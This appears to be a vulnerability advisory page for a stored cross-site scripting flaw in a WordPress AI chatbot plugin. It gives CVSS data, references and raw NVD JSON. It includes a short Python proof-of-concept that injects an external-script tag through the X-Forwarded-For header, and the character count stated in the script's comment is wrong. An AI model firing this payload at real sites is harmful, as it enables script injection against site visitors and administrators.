CVE-2026-2955

Description

The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AI Chatbot & Workflow Automation by AIWU <= 1.4.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2026-2955
# This script demonstrates how to send a malicious payload via the X-Forwarded-For header.
# Note: The payload is limited to 20 characters.

import requests

target_url = "http://example-wordpress-site.com/"

# Payload: <script src=//x> (18 chars) - Attempts to load an external script
# This fits within the 20-character storage limit.
payload = "<script src=//x>"

headers = {
    "User-Agent": "PoC-Scanner/1.0",
    "X-Forwarded-For": payload
}

try:
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200:
        print(f"[+] Request sent successfully.")
        print(f"[+] Injected Payload: {payload}")
        print(f"[+] Check the admin panel or visitor logs to verify execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2955
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2955
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2955/
[4] VulDB https://vuldb.com/cve/CVE-2026-2955
[5] https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2955", "sourceIdentifier": "[email protected]", "published": "2026-05-20T07:16:13.820", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve", "source": "[email protected]"}]}}